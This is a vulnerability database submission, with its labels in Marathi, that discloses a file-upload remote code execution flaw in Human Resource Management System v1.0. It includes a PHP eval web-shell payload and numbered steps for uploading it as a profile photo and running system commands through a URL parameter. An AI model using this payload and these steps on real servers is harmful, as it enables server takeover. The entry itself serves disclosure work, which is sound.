प्रस्तुत करा #48118: Human Resource Management System v1.0 - Remote Code Execution via File Upload Vulnerbility माहिती:

पदवीHuman Resource Management System v1.0 - Remote Code Execution via File Upload Vulnerbility
वर्णन# Exploit Title: Human Resource Management System v1.0 - Remote Code Execution via File Upload Vulnerbility # Exploit Author: Pratik Shetty # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Version: v1.0 # Tested on: Windows 10, Apache # CVE: ytd Description: In Human Resource Management System version 1.0 there is a File upload vulnerability which leads to Remote Code Execution. In that any attacker can execute malicious command and get the system access completely. Payload: <?php eval ("echo ".$_REQUEST["parameter"].";"); ?> Steps: 1) Login into the admin account 2) Now go to add employee 3) Now in that fill the details 4) Now upload "profile photo" in that upload a malicious PHP file. Payload: <?php eval ("echo ".$_REQUEST["parameter"].";"); ?> 5) Now save the data of this new employee 6) Go to his Profile and open the profile photo in next tab 7) Now in the above URL type this ?parameter=value;system('ls -l'); 8) As you can see our command injection is been executed
उपयोगकर्ता
 draco (UID 24011)
आधीनता13/10/2022 03:09 PM (3 वर्षानुवर्षे ago)
नेमस्तपणा13/10/2022 04:53 PM (2 hours later)
स्थानमान्य केले
VulDB entry210772 [SourceCodester Human Resource Management System 1.0 Profile Photo parameter विशेषाधिकार वाढीचे प्रमाण वाढले]
मुद्दे17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!